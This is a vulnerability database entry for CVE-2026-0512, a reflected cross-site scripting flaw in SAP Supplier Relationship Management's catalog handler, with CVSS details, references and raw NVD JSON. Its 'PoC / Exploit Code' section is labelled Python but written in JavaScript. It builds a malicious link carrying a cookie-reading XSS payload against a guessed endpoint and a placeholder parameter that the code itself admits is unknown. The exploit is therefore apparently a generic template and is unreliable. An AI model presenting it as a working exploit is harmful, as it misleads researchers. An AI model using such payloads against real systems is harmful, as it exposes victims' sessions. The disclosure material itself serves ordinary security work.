CVE-2026-0512

Description

Due to a Cross-Site Scripting (XSS) vulnerability in the SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL, that if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Supplier Relationship Management (SRM) (具体受影响版本请参考SAP Note 3645228)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-0512
// Target: SAP SRM Catalog SICF Handler
// Description: Demonstrates how a malicious payload can be injected via URL.

// 1. Construct the base URL of the vulnerable SAP SRM Catalog handler
var targetUrl = "https://[target-host]/sap/bc/webdynpro_abap/srm_cat_handler/";

// 2. Define the malicious JavaScript payload
// This payload simply alerts the document cookie to demonstrate execution
var xssPayload = "<img src=x onerror=alert(document.cookie)>";

// 3. Inject the payload into a vulnerable parameter (e.g., 'input_data' or similar)
// Note: The specific parameter name depends on the actual implementation details found in the SAP Handler
var exploitUrl = targetUrl + "?vulnerable_param=" + encodeURIComponent(xssPayload);

// Output the generated malicious link
console.log("[+] Generated Malicious URL:");
console.log(exploitUrl);

// 4. If a victim clicks the link, the script executes in the context of the victim's browser session.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0512
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0512
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0512/
[4] VulDB https://vuldb.com/cve/CVE-2026-0512
[5] https://me.sap.com/notes/3645228
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0512", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:03.700", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a Cross-Site Scripting (XSS) vulnerability in the SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL, that if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://me.sap.com/notes/3645228", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}